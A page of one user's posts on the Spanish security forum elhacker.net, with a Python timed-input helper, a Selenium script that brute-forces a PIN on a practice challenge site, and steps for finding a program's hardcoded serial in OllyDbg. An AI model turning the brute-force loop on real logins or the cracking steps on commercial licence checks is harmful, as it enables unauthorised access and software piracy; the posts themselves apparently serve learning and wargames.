elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 [58] 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 ... 139
571  Seguridad Informática / Análisis y Diseño de Malware / Re: Archivo vbs que borre carpeta escritorio. en: 4 Agosto 2016, 10:31 am
pues,que dirección de escritotio más rara! ¿y el user? revisa la dirección que estás pasando. Cuando pongas errores poné que error te da así no hay que interpretar todo el código. Que nic más k
572  Programación / Scripting / Re: Aporte python: casi emular input() pero con tiempo de espera en: 3 Agosto 2016, 10:28 am
no conozco todas las aplicaciones que se le podría dar, porque eso depende de cada programador, pero en mi caso lo uso en 1) juegos conversacionales donde por ejemplo muestro: ¿que cable cortar? y si la respuesta es errada o paso el tiempo muestro: "perdiste la bomba explotó" o sea en juegos con tomas de decisiones por opciones y tiempo
2) test de conocimientos y velocidad de tipeo, muestro:"como se dice 'uno' en inglés" y debe escribir bien y rápido, sino es un punto menos y ¿por qué tiempo en cada pregunta en vez de un tiempo total? fácil por que no lleva lo mismo escribir "one" que "last week i saw movies" y evalúo por respuesta.
eso básicamente uso yo, pero obviamente siempre lo voy complicando en el código.
Claro que vos pódes usarlo en otra cosa que se ocurra! y postearlo de paso.
573  Foros Generales / Foro Libre / Re: ¿Por que empezasteis a hack... estudiar cosas relacionadas con la informatica..? en: 2 Agosto 2016, 08:02 am
empecé con la informática por puro gusto (mi trabajo no tiene nada que ver ni se necesita un pc practicamente)como todos al principio usaba programas share y buscaba los cracks, pero me interesaba saber ¿como hacían eso? así que aguante la ingeniería inversa!, también jugaba y aprendía diseño gráfico, y entonces ¿cómo se programa una utilidad? listo aguanten los lenguajes! Todo lo que aprendo lo uso para mí y si puedo transmito lo que sé, ya que así es como aprendí, por un montón de tipos desinteresados que comparten su conocimiento libremente. Ahora no soy para nada altruista de que quiero cambiar el mundo, cada cual hace lo que quiere y vive como puede,no todos quieren ver que hay otras cosas, todo cambio genera una resistencia y no estoy dispuesto a querer combatir o participar en esa resistencia.
574  Programación / Scripting / Aporte python: casi emular input() pero con tiempo de espera en: 2 Agosto 2016, 03:31 am
Muchas veces me preguntan y veo que preguntan como continuar si hay un input() y el usuario no presiona ENTER,lo más correcto desde mi perspectiva es usar threads y semaforos, pero cuando digo eso la respuesta más común es: "¿pódes hacer el código?, no manejo threads", pues bien, cualquiera puede hacer el código, el tema es que la mayoría solo copia y pega sin aprender nada, entonces me parece mejor hacer un código que haga algo similar y muy fácil, ya que usa lo más común de python.
Otra cosa, solo trabajo sobre windows y python 3.x por lo que el funcionamiento en otros S.O o versiones anteriores de python (2.x) no me interesan ni probar.
Bueno así usaría una función para casi emular input y que se corte con tiempo, por supuesto hay muchas más formas de hacerlo, pero quizá este sea un puntapie de inicio para sus códigos(que espero posteen)
Está incompleto por supuesto, pero si funcional en lo simple.
Claro que todos sabemos que esto es por consola y que si fuese con tkinter sería mucho más simple y mejor.
Código
  1. #-*- coding:utf-8 -*-
  2. import msvcrt
  3. import time
  4. def input_tiempo(aviso = ">>>",duracion=10): #aviso es el prompt y duración cuanto hay que esperar
  5.    global nombre                              
  6.    nombre=""
  7.    print (aviso)    
  8.    finaliza = time.time() + duracion        #cuando terminar de esperar
  9.    while time.time()< finaliza:            
  10.        if msvcrt.kbhit():                   #msvcrt está recontra documentado y hay cientos de ejemplos    
  11.            letra= msvcrt.getche().decode('ASCII')
  12.            if letra == "\r":                 #si el usuario presiona enter sigue normal    
  13.                break
  14.            else:
  15.                nombre+= letra
  16. #forma de uso          
  17. q=input_tiempo("Escribe tu nombre: ")  #pongo lo que quiera y si no pongo duración es la que viene x defecto
  18. if nombre != "":
  19.    print("\nHola ¡¡ {} !!".format(nombre))
  20. else:
  21.    print("Hola desconocido")    
  22.  
Saludos   
575  Programación / Scripting / Re: como creo un archivo en usb con vbs? en: 31 Julio 2016, 14:51 pm
Hola, tendrías que empezar por:
http://foro.elhacker.net/scripting/tutorial_vbscript-t229032.0.html

cuando tengas una duda puntual los que saben seguro te ayudarán.
Saludos.
576  Seguridad Informática / Desafíos - Wargames / Re: [RETO] Averiguar El Nip de 4 Digitos para acceder en: 30 Julio 2016, 05:36 am
recién veo el desafío porque no soy de mirar esta parte del foro, la verdad seguro se puede hacer de otra forma, pero es para alguien que sepa más que yo, ahora como vi que lo resuelven por bruteforce con vb.net voy a mostrar otra forma de hacer lo mismo con python
Código
  1. #-*- coding:utf-8 -*-
  2. import time,unittest
  3. from selenium import webdriver        
  4.  
  5. pagina = webdriver.Firefox()        
  6. pagina.get("http://practicashacking.net23.net/login.php")
  7. numero=0
  8. while numero < 1000:
  9.    if numero < 100:
  10.        numero=str(numero).zfill(3)
  11.        llenar=numero
  12.        numero=int(numero)
  13.        pin = pagina.find_element_by_name("digi")  
  14.        pin.clear()        
  15.        pin.send_keys(llenar)                
  16.        acceder = pagina.find_element_by_name("enviar")  
  17.        acceder.click()                              
  18.        chico_malo=pagina.find_elements_by_xpath("//img[@src='access-denied.png']")
  19.        if len(chico_malo) == 1:        
  20.            pagina.back()
  21.            numero+=1
  22.        else:
  23.            print(numero)            
  24.            pagina.quit()
  25.    else:
  26.        llenar=numero
  27.        pin = pagina.find_element_by_name("digi")  
  28.        pin.clear()        
  29.        pin.send_keys(llenar)                
  30.        acceder = pagina.find_element_by_name("enviar")
  31.        acceder.click()                                
  32.        chico_malo=pagina.find_elements_by_xpath("//img[@src='access-denied.png']")
  33.        if len(chico_malo) == 1:
  34.            pagina.back()
  35.            numero+=1
  36.        else:
  37.            print(numero)
  38.            pagina.quit()
  39.  
>>>795

se puede mejorar mucho con clases e hilos(pero eso es un tutorial aparte) para agilizar la búsqueda y creo pero no estoy del todo seguro en cuanto a web, también usar CUDA,además de eliminar algún error.
Otra cosa, vi que Flamer pusiste como saltar lo del click derecho por medio de edición de código, es mucho más facil si simplemente presionas simultaneamente Shift + click-derecho

Saludos.
577  Programación / Programación Visual Basic / Re: [Ayuda pls] Como poner consola en programa VB en: 27 Julio 2016, 04:15 am
lo que faltaría saber es si el cmd lo ejecutas independientemente o los comandos los envías desde vb
578  Programación / Ingeniería Inversa / Re: No se continuar.... en: 27 Julio 2016, 02:01 am
podrías poner bp en las apis de manejo de archivos(ya que hay un *.lic) por ejemplo ReadFile,CreateFile o GetOpenFileName y si para allí tracear para ver que datos lee y como los maneja. 
579  Programación / Ingeniería Inversa / Re: Ayuda a activar este programa en: 25 Julio 2016, 03:08 am
que bien que hayas podido, ahora lo bueno sería que sigas practicando y aprendidendo, ya que si esta huevada te puso feliz, imaginate cuando puedas hacer cualquier otra! espero que no abandones solo con esto. Saludos.
580  Programación / Ingeniería Inversa / Re: Ayuda a activar este programa en: 24 Julio 2016, 22:29 pm
en realidad me sorprende que hayas sacado el packer y no lo puedas registrar ya que es tan fácil que da pena.

pero como por lo menos lo pusiste sin el packer te ayudaré un poco.
si revisas el archivo verás que es compilado en delphi, pues bien entonces para verlo mejor puedes usar dede o idr(es más actual y completo)
ahora también lo cargo en olly lo ejecuto y pongo un serial cualquiera
muestra en mensaje This key is invalid etc...
si buscas en en el memory map la cadena key is invalid te muestra la dirección donde está guardada
vas a esa dirección y con click derecho find references etc...
cuando llegas a esa dirección ves que viene de un salto condicional

y antes del salto hay un call, entrando a ese call y debugeando un poco ves el serial ya que está hardcodeado.

como dije es una huevada.
Páginas: 1 ... 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 [58] 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 ... 139
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines